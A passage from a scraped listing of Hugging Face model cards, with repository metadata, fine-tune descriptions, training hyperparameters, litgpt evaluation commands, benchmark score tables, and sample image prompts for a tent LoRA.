PLEASE ONLY USE FOR REFERENCE.
This model is trained with [ultrachat_200k](https://huggingface.co/datasets/HuggingFaceH4/ultrachat_200k) data to have conversational features.
# MODEL ARCHITECTURE
This model was initialized with [Mistral-7B-v0.1](https://huggingface.co/mistralai/Mistral-7B-v0.1/tree/main)
# PLEASE NOTE
Users and sponsors should be wary that many models are also unreliable. I hope our model can show the vulnerablity of the leaderboard.
|
thanhkt/QWen-3B-Math | thanhkt | 2024-10-10T11:31:54Z | 52 | 0 | transformers | [
"transformers",
"safetensors",
"gguf",
"text-generation-inference",
"unsloth",
"qwen2",
"trl",
"en",
"base_model:unsloth/Qwen2.5-3B-Instruct-bnb-4bit",
"base_model:quantized:unsloth/Qwen2.5-3B-Instruct-bnb-4bit",
"license:apache-2.0",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2024-10-10T11:18:16Z | ---
base_model: unsloth/Qwen2.5-3B-Instruct-bnb-4bit
language:
- en
license: apache-2.0
tags:
- text-generation-inference
- transformers
- unsloth
- qwen2
- trl
---
# Uploaded model
- **Developed by:** thanhkt
- **License:** apache-2.0
- **Finetuned from model :** unsloth/Qwen2.5-3B-Instruct-bnb-4bit
This qwen2 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
cuongdev/vtthuc | cuongdev | 2024-10-10T11:30:50Z | 30 | 0 | diffusers | [
"diffusers",
"text-to-image",
"stable-diffusion",
"license:creativeml-openrail-m",
"autotrain_compatible",
"endpoints_compatible",
"diffusers:StableDiffusionPipeline",
"region:us"
] | text-to-image | 2024-10-10T11:25:20Z | ---
license: creativeml-openrail-m
tags:
- text-to-image
- stable-diffusion
---
### vtthuc Dreambooth model trained by cuongdev with [TheLastBen's fast-DreamBooth](https://colab.research.google.com/github/TheLastBen/fast-stable-diffusion/blob/main/fast-DreamBooth.ipynb) notebook
Test the concept via A1111 Colab [fast-Colab-A1111](https://colab.research.google.com/github/TheLastBen/fast-stable-diffusion/blob/main/fast_stable_diffusion_AUTOMATIC1111.ipynb)
Sample pictures of this concept:
|
pphuc25/llama-3.1-8B-KG | pphuc25 | 2024-10-10T11:28:23Z | 39 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T11:24:43Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
sumukhshadakshari/whisper-finetuned-bial2 | sumukhshadakshari | 2024-10-10T11:27:44Z | 77 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"whisper",
"automatic-speech-recognition",
"generated_from_trainer",
"en",
"base_model:openai/whisper-tiny",
"base_model:finetune:openai/whisper-tiny",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | automatic-speech-recognition | 2024-10-07T03:43:17Z | ---
library_name: transformers
language:
- en
license: apache-2.0
base_model: openai/whisper-tiny
tags:
- generated_from_trainer
metrics:
- wer
model-index:
- name: sumukhshadakshari/whisper-finetuned-bial2
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# sumukhshadakshari/whisper-finetuned-bial2
This model is a fine-tuned version of [openai/whisper-tiny](https://huggingface.co/openai/whisper-tiny) on the bial2 dataset.
It achieves the following results on the evaluation set:
- Loss: 0.3229
- Wer: 31.7789
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 1e-05
- train_batch_size: 16
- eval_batch_size: 16
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 500
- num_epochs: 5
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss | Wer |
|:-------------:|:-----:|:----:|:---------------:|:--------:|
| 1.4255 | 1.0 | 257 | 1.3274 | 102.7404 |
| 0.5538 | 2.0 | 514 | 0.5221 | 44.0872 |
| 0.3054 | 3.0 | 771 | 0.3637 | 30.5956 |
| 0.202 | 4.0 | 1028 | 0.3305 | 28.6649 |
| 0.1601 | 5.0 | 1285 | 0.3229 | 31.7789 |
### Framework versions
- Transformers 4.44.1
- Pytorch 2.4.1
- Datasets 2.19.1
- Tokenizers 0.19.1
|
pramattale/model_3_2_it | pramattale | 2024-10-10T11:25:17Z | 82 | 0 | transformers | [
"transformers",
"pytorch",
"llama",
"text-generation",
"text-generation-inference",
"unsloth",
"trl",
"sft",
"conversational",
"en",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T11:20:54Z | ---
base_model: unsloth/llama-3.2-3b-instruct-bnb-4bit
language:
- en
license: apache-2.0
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
- sft
---
# Uploaded model
- **Developed by:** pramattale
- **License:** apache-2.0
- **Finetuned from model :** unsloth/llama-3.2-3b-instruct-bnb-4bit
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
MikeRoz/TheDrummer_Behemoth-123B-v1-4.0bpw-h6-exl2 | MikeRoz | 2024-10-10T11:23:48Z | 5 | 0 | null | [
"safetensors",
"mistral",
"license:other",
"4-bit",
"exl2",
"region:us"
] | null | 2024-10-10T07:15:16Z | ---
license: other
---
# Join our Discord! https://discord.gg/Nbv9pQ88Xb
## 1500+ members strong 💪
---
[BeaverAI](https://huggingface.co/BeaverAI) proudly presents...
# Behemoth 123B v1 🦣
*When you spend your whole life living under a dome, even the idea of an ocean seems impossible to imagine.*

## Description
Testers have reported:
- Better creativity and variety
- Improved prose
- Less positivity, more unhinged (especially on Metharme)
- Good intelligence, sharp on nuances and recall.
## Links
- Original: https://huggingface.co/TheDrummer/Behemoth-123B-v1
- GGUF: https://huggingface.co/TheDrummer/Behemoth-123B-v1-GGUF
- iMatrix: https://huggingface.co/bartowski/Behemoth-123B-v1-GGUF (recommended for small quants)
## Arsenal (Supported Chat Templates)
- Mistral for Instruct / RP / Story
- Smart, adaptable, familiar
- Metharme (a.k.a. Pygmalion in ST) for RP / Story
- Creative, unhinged, unique
- Text Completion for RP
- You can mix it up and see which works best for you.
### Favorite RP Format
`*action* Dialogue *thoughts* Dialogue *narration*` in 1st person PoV
## What's Next?
- Looking into v1.1...
- Already have plans for a v2!
## Special Thanks
- Thank you to each and everyone who donated in [Ko-Fi](https://ko-fi.com/thedrummer) to make our venture a little bit easier.
- KinjiHakari777, Dr. Fjut, Kistara, Pseudo, AlexTheVP, Dakkidaze, EvarinSharath'fe, ONTHEREDTEAM, F, Mariana, Garg, Silva, Grozi, & **Phaelon**

<audio controls src="https://cdn-uploads.huggingface.co/production/uploads/65f2fd1c25b848bd061b5c2e/FNWdi0WlH-Xd3fjkGVPpp.mpga"></audio>
|
tangledgroup/tangled-llama-t-128k-base-v0.1 | tangledgroup | 2024-10-10T11:20:13Z | 11 | 0 | transformers | [
"transformers",
"llama",
"text-generation",
"litgpt",
"litdata",
"conversational",
"en",
"am",
"ar",
"as",
"az",
"be",
"bg",
"bn",
"br",
"bs",
"ca",
"cs",
"cy",
"da",
"de",
"el",
"eo",
"es",
"et",
"eu",
"fa",
"ff",
"fi",
"fr",
"fy",
"ga",
"gd",
"gl",
"gn",
"gu",
"ha",
"he",
"hi",
"hr",
"ht",
"hu",
"hy",
"id",
"ig",
"is",
"it",
"ja",
"jv",
"ka",
"kk",
"km",
"kn",
"ko",
"ku",
"ky",
"la",
"lg",
"li",
"ln",
"lo",
"lt",
"lv",
"mg",
"mk",
"ml",
"mn",
"mr",
"ms",
"my",
"ne",
"nl",
"no",
"ns",
"om",
"or",
"pa",
"pl",
"ps",
"pt",
"qu",
"rm",
"ro",
"ru",
"sa",
"si",
"sc",
"sd",
"sk",
"sl",
"so",
"sq",
"sr",
"ss",
"su",
"sv",
"sw",
"ta",
"te",
"th",
"tl",
"tn",
"tr",
"ug",
"uk",
"ur",
"uz",
"vi",
"wo",
"xh",
"yi",
"yo",
"zu",
"dataset:yahma/alpaca-cleaned",
"dataset:gbharti/wealth-alpaca_lora",
"dataset:databricks/databricks-dolly-15k",
"dataset:VMware/open-instruct",
"dataset:saillab/taco-datasets",
"dataset:xu-song/cc100-samples",
"dataset:jordiclive/wikipedia-summary-dataset",
"dataset:bigcode/the-stack-smol-xs",
"dataset:m-a-p/CodeFeedback-Filtered-Instruction",
"dataset:jtatman/python-code-dataset-500k",
"dataset:iamtarun/python_code_instructions_18k_alpaca",
"dataset:HuggingFaceH4/CodeAlpaca_20K",
"dataset:cognitivecomputations/dolphin-coder",
"dataset:fblgit/simple-math",
"dataset:gair-prox/open-web-math-pro",
"dataset:rvv-karma/Math-QA",
"dataset:ajibawa-2023/Maths-College",
"dataset:microsoft/orca-math-word-problems-200k",
"dataset:meta-math/MetaMathQA",
"dataset:TIGER-Lab/MathInstruct",
"dataset:TIGER-Lab/WebInstructSub",
"dataset:SkunkworksAI/reasoning-0.01",
"dataset:KingNish/reasoning-base-20k",
"dataset:Magpie-Align/Magpie-Reasoning-150K",
"dataset:thesven/gsm8k-reasoning",
"dataset:AlgorithmicResearchGroup/math_reasoning_autoformalization_track",
"dataset:badrex/llm-emoji-dataset",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-06T16:24:54Z | ---
license: apache-2.0
pipeline_tag: text-generation
library_name: transformers
language: [
'en', 'am', 'ar', 'as', 'az', 'be', 'bg', 'bn', 'br', 'bs', 'ca', 'cs', 'cy', 'da', 'de', 'el',
'eo', 'es', 'et', 'eu', 'fa', 'ff', 'fi', 'fr', 'fy', 'ga', 'gd', 'gl', 'gn', 'gu', 'ha', 'he',
'hi', 'hr', 'ht', 'hu', 'hy', 'id', 'ig', 'is', 'it', 'ja', 'jv', 'ka', 'kk', 'km', 'kn', 'ko',
'ku', 'ky', 'la', 'lg', 'li', 'ln', 'lo', 'lt', 'lv', 'mg', 'mk', 'ml', 'mn', 'mr', 'ms', 'my',
'ne', 'nl', 'no', 'ns', 'om', 'or', 'pa', 'pl', 'ps', 'pt', 'qu', 'rm', 'ro', 'ru', 'sa', 'si',
'sc', 'sd', 'sk', 'sl', 'so', 'sq', 'sr', 'ss', 'su', 'sv', 'sw', 'ta', 'te', 'th', 'tl', 'tn',
'tr', 'ug', 'uk', 'ur', 'uz', 'vi', 'wo', 'xh', 'yi', 'yo', 'zu',
]
datasets: [
'yahma/alpaca-cleaned',
'gbharti/wealth-alpaca_lora',
'databricks/databricks-dolly-15k',
'VMware/open-instruct',
'saillab/taco-datasets',
'xu-song/cc100-samples',
'jordiclive/wikipedia-summary-dataset',
'bigcode/the-stack-smol-xs',
'm-a-p/CodeFeedback-Filtered-Instruction',
'jtatman/python-code-dataset-500k',
'iamtarun/python_code_instructions_18k_alpaca',
'HuggingFaceH4/CodeAlpaca_20K',
'cognitivecomputations/dolphin-coder',
'fblgit/simple-math',
'gair-prox/open-web-math-pro',
'rvv-karma/Math-QA',
'ajibawa-2023/Maths-College',
'microsoft/orca-math-word-problems-200k',
'meta-math/MetaMathQA',
'TIGER-Lab/MathInstruct',
'TIGER-Lab/WebInstructSub',
'SkunkworksAI/reasoning-0.01',
'KingNish/reasoning-base-20k',
'Magpie-Align/Magpie-Reasoning-150K',
'thesven/gsm8k-reasoning',
'AlgorithmicResearchGroup/math_reasoning_autoformalization_track',
'badrex/llm-emoji-dataset',
]
tags:
- litgpt
- litdata
---
# tangled-llama-t-32k-base-v0.1

A pretrained language model based on the Llama model with about **25M** parameters. This model has been trained on **22.1B** (`22,111,299,936`) tokens from more than **3.6M** (`3,597,088`) dataset rows.
This model **isn't** designed for immediate use but rather for Continued Pretraining and Finetuning on a downstream task. While it can handle a context length of up to **128K** (`131,072`) tokens, it was pretrained with sequences of **2K** (`2048`) tokens.
The objective is to streamline the cognitive or reasoning core, eliminating any redundant knowledge from the model.
[loss, val_loss](https://api.wandb.ai/links/mtasic85/t66yvgeh)
[val_ppl](https://api.wandb.ai/links/mtasic85/osr62qqd)
[epoch](https://api.wandb.ai/links/mtasic85/pw0ilz5s)
[learning_rate](https://api.wandb.ai/links/mtasic85/867ueoyx)
## lm-evaluation-harness
```bash
litgpt evaluate --tasks 'hellaswag,gsm8k,truthfulqa_mc2,mmlu,winogrande,arc_challenge' --out_dir 'evaluate-quick/' --batch_size 4 --dtype 'bfloat16' out/pretrain/final/
```
Tasks |Version| Filter |n-shot| Metric | |Value | |Stderr|
|---------------------------------------|------:|----------------|-----:|-----------|---|-----:|---|-----:|
|arc_challenge | 1|none | 0|acc |↑ |0.1971|± |0.0116|
| | |none | 0|acc_norm |↑ |0.2423|± |0.0125|
|gsm8k | 3|flexible-extract| 5|exact_match|↑ |0.0099|± |0.0027|
| | |strict-match | 5|exact_match|↑ |0.0000|± |0.0000|
|hellaswag | 1|none | 0|acc |↑ |0.2608|± |0.0044|
| | |none | 0|acc_norm |↑ |0.2665|± |0.0044|
|mmlu | 2|none | |acc |↑ |0.2451|± |0.0036|
| - humanities | 2|none | |acc |↑ |0.2470|± |0.0063|
| - formal_logic | 1|none | 0|acc |↑ |0.3254|± |0.0419|
| - high_school_european_history | 1|none | 0|acc |↑ |0.2545|± |0.0340|
| - high_school_us_history | 1|none | 0|acc |↑ |0.2745|± |0.0313|
| - high_school_world_history | 1|none | 0|acc |↑ |0.2194|± |0.0269|
| - international_law | 1|none | 0|acc |↑ |0.2231|± |0.0380|
| - jurisprudence | 1|none | 0|acc |↑ |0.2685|± |0.0428|
| - logical_fallacies | 1|none | 0|acc |↑ |0.2025|± |0.0316|
| - moral_disputes | 1|none | 0|acc |↑ |0.2457|± |0.0232|
| - moral_scenarios | 1|none | 0|acc |↑ |0.2670|± |0.0148|
| - philosophy | 1|none | 0|acc |↑ |0.1865|± |0.0221|
| - prehistory | 1|none | 0|acc |↑ |0.2500|± |0.0241|
| - professional_law | 1|none | 0|acc |↑ |0.2523|± |0.0111|
| - world_religions | 1|none | 0|acc |↑ |0.1871|± |0.0299|
| - other | 2|none | |acc |↑ |0.2456|± |0.0077|
| - business_ethics | 1|none | 0|acc |↑ |0.3400|± |0.0476|
| - clinical_knowledge | 1|none | 0|acc |↑ |0.2113|± |0.0251|
| - college_medicine | 1|none | 0|acc |↑ |0.2543|± |0.0332|
| - global_facts | 1|none | 0|acc |↑ |0.1800|± |0.0386|
| - human_aging | 1|none | 0|acc |↑ |0.1749|± |0.0255|
| - management | 1|none | 0|acc |↑ |0.3398|± |0.0469|
| - marketing | 1|none | 0|acc |↑ |0.2479|± |0.0283|
| - medical_genetics | 1|none | 0|acc |↑ |0.3100|± |0.0465|
| - miscellaneous | 1|none | 0|acc |↑ |0.2171|± |0.0147|
| - nutrition | 1|none | 0|acc |↑ |0.2647|± |0.0253|
| - professional_accounting | 1|none | 0|acc |↑ |0.2270|± |0.0250|
| - professional_medicine | 1|none | 0|acc |↑ |0.2978|± |0.0278|
| - virology | 1|none | 0|acc |↑ |0.3133|± |0.0361|
| - social sciences | 2|none | |acc |↑ |0.2584|± |0.0079|
| - econometrics | 1|none | 0|acc |↑ |0.2193|± |0.0389|
| - high_school_geography | 1|none | 0|acc |↑ |0.2677|± |0.0315|
| - high_school_government_and_politics| 1|none | 0|acc |↑ |0.2435|± |0.0310|
| - high_school_macroeconomics | 1|none | 0|acc |↑ |0.2538|± |0.0221|
| - high_school_microeconomics | 1|none | 0|acc |↑ |0.2647|± |0.0287|
| - high_school_psychology | 1|none | 0|acc |↑ |0.2679|± |0.0190|
| - human_sexuality | 1|none | 0|acc |↑ |0.3435|± |0.0416|
| - professional_psychology | 1|none | 0|acc |↑ |0.2190|± |0.0167|
| - public_relations | 1|none | 0|acc |↑ |0.2091|± |0.0390|
| - security_studies | 1|none | 0|acc |↑ |0.2980|± |0.0293|
| - sociology | 1|none | 0|acc |↑ |0.2836|± |0.0319|
| - us_foreign_policy | 1|none | 0|acc |↑ |0.3000|± |0.0461|
| - stem | 2|none | |acc |↑ |0.2287|± |0.0075|
| - abstract_algebra | 1|none | 0|acc |↑ |0.2100|± |0.0409|
| - anatomy | 1|none | 0|acc |↑ |0.2000|± |0.0346|
| - astronomy | 1|none | 0|acc |↑ |0.2434|± |0.0349|
| - college_biology | 1|none | 0|acc |↑ |0.3333|± |0.0394|
| - college_chemistry | 1|none | 0|acc |↑ |0.3000|± |0.0461|
| - college_computer_science | 1|none | 0|acc |↑ |0.2600|± |0.0441|
| - college_mathematics | 1|none | 0|acc |↑ |0.3100|± |0.0465|
| - college_physics | 1|none | 0|acc |↑ |0.2353|± |0.0422|
| - computer_security | 1|none | 0|acc |↑ |0.2300|± |0.0423|
| - conceptual_physics | 1|none | 0|acc |↑ |0.2085|± |0.0266|
| - electrical_engineering | 1|none | 0|acc |↑ |0.2621|± |0.0366|
| - elementary_mathematics | 1|none | 0|acc |↑ |0.2011|± |0.0206|
| - high_school_biology | 1|none | 0|acc |↑ |0.2097|± |0.0232|
| - high_school_chemistry | 1|none | 0|acc |↑ |0.2217|± |0.0292|
| - high_school_computer_science | 1|none | 0|acc |↑ |0.2300|± |0.0423|
| - high_school_mathematics | 1|none | 0|acc |↑ |0.1926|± |0.0240|
| - high_school_physics | 1|none | 0|acc |↑ |0.2318|± |0.0345|
| - high_school_statistics | 1|none | 0|acc |↑ |0.1806|± |0.0262|
| - machine_learning | 1|none | 0|acc |↑ |0.2857|± |0.0429|
|truthfulqa_mc2 | 2|none | 0|acc |↑ |0.4880|± |0.0161|
|winogrande | 1|none | 0|acc |↑ |0.5185|± |0.0140|
| Groups |Version|Filter|n-shot|Metric| |Value | |Stderr|
|------------------|------:|------|------|------|---|-----:|---|-----:|
|mmlu | 2|none | |acc |↑ |0.2451|± |0.0036|
| - humanities | 2|none | |acc |↑ |0.2470|± |0.0063|
| - other | 2|none | |acc |↑ |0.2456|± |0.0077|
| - social sciences| 2|none | |acc |↑ |0.2584|± |0.0079|
| - stem | 2|none | |acc |↑ |0.2287|± |0.0075|
```bash
litgpt evaluate --tasks 'leaderboard' --out_dir 'evaluate-leaderboard/' --batch_size 4 --dtype 'bfloat16' out/pretrain/final/
```
| Tasks |Version|Filter|n-shot| Metric | |Value | |Stderr|
|-----------------------------------------------------------|-------|------|-----:|-----------------------|---|-----:|---|------|
|leaderboard | N/A| | | | | | | |
| - leaderboard_bbh | N/A| | | | | | | |
| - leaderboard_bbh_boolean_expressions | 1|none | 3|acc_norm |↑ |0.4600|± |0.0316|
| - leaderboard_bbh_causal_judgement | 1|none | 3|acc_norm |↑ |0.5027|± |0.0367|
| - leaderboard_bbh_date_understanding | 1|none | 3|acc_norm |↑ |0.1720|± |0.0239|
| - leaderboard_bbh_disambiguation_qa | 1|none | 3|acc_norm |↑ |0.2960|± |0.0289|
| - leaderboard_bbh_formal_fallacies | 1|none | 3|acc_norm |↑ |0.4880|± |0.0317|
| - leaderboard_bbh_geometric_shapes | 1|none | 3|acc_norm |↑ |0.0000|± | 0|
| - leaderboard_bbh_hyperbaton | 1|none | 3|acc_norm |↑ |0.5160|± |0.0317|
| - leaderboard_bbh_logical_deduction_five_objects | 1|none | 3|acc_norm |↑ |0.2000|± |0.0253|
| - leaderboard_bbh_logical_deduction_seven_objects | 1|none | 3|acc_norm |↑ |0.1480|± |0.0225|
| - leaderboard_bbh_logical_deduction_three_objects | 1|none | 3|acc_norm |↑ |0.3160|± |0.0295|
| - leaderboard_bbh_movie_recommendation | 1|none | 3|acc_norm |↑ |0.2360|± |0.0269|
| - leaderboard_bbh_navigate | 1|none | 3|acc_norm |↑ |0.4680|± |0.0316|
| - leaderboard_bbh_object_counting | 1|none | 3|acc_norm |↑ |0.0480|± |0.0135|
| - leaderboard_bbh_penguins_in_a_table | 1|none | 3|acc_norm |↑ |0.1918|± |0.0327|
| - leaderboard_bbh_reasoning_about_colored_objects | 1|none | 3|acc_norm |↑ |0.1440|± |0.0222|
| - leaderboard_bbh_ruin_names | 1|none | 3|acc_norm |↑ |0.2360|± |0.0269|
| - leaderboard_bbh_salient_translation_error_detection | 1|none | 3|acc_norm |↑ |0.1360|± |0.0217|
| - leaderboard_bbh_snarks | 1|none | 3|acc_norm |↑ |0.5225|± |0.0375|
| - leaderboard_bbh_sports_understanding | 1|none | 3|acc_norm |↑ |0.4560|± |0.0316|
| - leaderboard_bbh_temporal_sequences | 1|none | 3|acc_norm |↑ |0.2960|± |0.0289|
| - leaderboard_bbh_tracking_shuffled_objects_five_objects | 1|none | 3|acc_norm |↑ |0.2120|± |0.0259|
| - leaderboard_bbh_tracking_shuffled_objects_seven_objects| 1|none | 3|acc_norm |↑ |0.1840|± |0.0246|
| - leaderboard_bbh_tracking_shuffled_objects_three_objects| 1|none | 3|acc_norm |↑ |0.3160|± |0.0295|
| - leaderboard_bbh_web_of_lies | 1|none | 3|acc_norm |↑ |0.5200|± |0.0317|
| - leaderboard_gpqa | N/A| | | | | | | |
| - leaderboard_gpqa_diamond | 1|none | 0|acc_norm |↑ |0.2172|± |0.0294|
| - leaderboard_gpqa_extended | 1|none | 0|acc_norm |↑ |0.2454|± |0.0184|
| - leaderboard_gpqa_main | 1|none | 0|acc_norm |↑ |0.2478|± |0.0204|
| - leaderboard_ifeval | 3|none | 0|inst_level_loose_acc |↑ |0.1727|± | N/A|
| | |none | 0|inst_level_strict_acc |↑ |0.1559|± | N/A|
| | |none | 0|prompt_level_loose_acc |↑ |0.0832|± |0.0119|
| | |none | 0|prompt_level_strict_acc|↑ |0.0795|± |0.0116|
| - leaderboard_math_hard | N/A| | | | | | | |
| - leaderboard_math_algebra_hard | 1|none | 4|exact_match |↑ |0.0000|± | 0|
| - leaderboard_math_counting_and_prob_hard | 1|none | 4|exact_match |↑ |0.0000|± | 0|
| - leaderboard_math_geometry_hard | 1|none | 4|exact_match |↑ |0.0000|± | 0|
| - leaderboard_math_intermediate_algebra_hard | 1|none | 4|exact_match |↑ |0.0000|± | 0|
| - leaderboard_math_num_theory_hard | 1|none | 4|exact_match |↑ |0.0000|± | 0|
| - leaderboard_math_prealgebra_hard | 1|none | 4|exact_match |↑ |0.0000|± | 0|
| - leaderboard_math_precalculus_hard | 1|none | 4|exact_match |↑ |0.0000|± | 0|
| - leaderboard_mmlu_pro | 0.1|none | 5|acc |↑ |0.1135|± |0.0029|
| - leaderboard_musr | N/A| | | | | | | |
| - leaderboard_musr_murder_mysteries | 1|none | 0|acc_norm |↑ |0.5240|± |0.0316|
| - leaderboard_musr_object_placements | 1|none | 0|acc_norm |↑ |0.2734|± |0.0279|
| - leaderboard_musr_team_allocation | 1|none | 0|acc_norm |↑ |0.3000|± |0.0290|
```bash
litgpt evaluate --tasks 'bbh_zeroshot,bbh_fewshot,bbh_cot_fewshot,bbh_cot_zeroshot' --out_dir 'evaluate-bigbenchhard/' --batch_size 4 --dtype 'bfloat16' out/pretrain/final/
```
```bash
litgpt evaluate --tasks 'mmlu,mmlu_pro' --out_dir 'evaluate-mmlu/' --batch_size 4 --dtype 'bfloat16' out/pretrain/final/
```
```bash
litgpt evaluate --tasks 'arc_challenge,boolq,gpqa,hellaswag,openbookqa,piqa,truthfulqa_mc2,winogrande' --out_dir 'evaluate-reasoning/' --batch_size 4 --dtype 'bfloat16' out/pretrain/final/
```
```bash
litgpt evaluate --tasks 'mmlu_multilingual,mgsm' --out_dir 'evaluate-multilinguals/' --batch_size 4 --dtype 'bfloat16' out/pretrain/final/
```
```bash
litgpt evaluate --tasks 'gsm8k,mathqa' --out_dir 'evaluate-math/' --batch_size 4 --dtype 'bfloat16' out/pretrain/final/
```
|Tasks |Version| Filter |n-shot| Metric | |Value | |Stderr|
|------|------:|----------------|-----:|-----------|---|-----:|---|-----:|
|gsm8k | 3|flexible-extract| 5|exact_match|↑ |0.0099|± |0.0027|
| | |strict-match | 5|exact_match|↑ |0.0000|± |0.0000|
|mathqa| 1|none | 0|acc |↑ |0.2121|± |0.0075|
| | |none | 0|acc_norm |↑ |0.2114|± |0.0075|
```bash
litgpt evaluate --tasks 'wikitext,qasper' --out_dir 'evaluate-long/' --batch_size 4 --dtype 'bfloat16' out/pretrain/final/
```
|
Kvisten/abisko-lite-3-v1 | Kvisten | 2024-10-10T11:17:16Z | 6 | 1 | diffusers | [
"diffusers",
"text-to-image",
"flux",
"lora",
"template:sd-lora",
"ai-toolkit",
"base_model:black-forest-labs/FLUX.1-schnell",
"base_model:adapter:black-forest-labs/FLUX.1-schnell",
"license:apache-2.0",
"region:us"
] | text-to-image | 2024-10-10T11:17:08Z | ---
tags:
- text-to-image
- flux
- lora
- diffusers
- template:sd-lora
- ai-toolkit
widget:
- text: A light blue abisko-lite-3 tent set up on a rocky mountain ridge, surrounded
by rugged terrain and distant snow-capped peaks. The tent's guy lines are
secured to nearby rocks, and the fabric flutters slightly in the breeze. A
few scattered wildflowers can be seen growing between the rocks.
output:
url: samples/1728558986100__000003500_0.jpg
- text: A green Abisko lite 3 tent pitched in a dense forest clearing. Tall pine
trees surround the tent, and dappled sunlight filters through the branches,
casting soft shadows on the tent's surface. Fallen leaves and moss cover the
ground, adding a touch of green to the scene.
output:
url: samples/1728558994824__000003500_1.jpg
- text: The light blue abisko-lite-3 tent stands on a sandy beach near a calm lake,
with gentle waves lapping at the shore. The tent's fabric contrasts against
the golden sand, and a few scattered driftwood pieces lie nearby. The sun
is setting, casting a warm glow over the water.
output:
url: samples/1728559003546__000003500_2.jpg
- text: A olive-green abisko-lite-3 tent set up in an open field covered in fresh
snow. The tent is surrounded by tall pine trees dusted with snow, and the
sky is overcast, with light snowflakes gently falling. The tent's guy lines
are staked firmly into the snow, and a few animal tracks are visible nearby.
output:
url: samples/1728559012268__000003500_3.jpg
- text: A abisko-lite-3 tent, olive-green color, pitched on a grassy hillside, with
its streamlined, tunnel-shaped design tapering down from the higher front
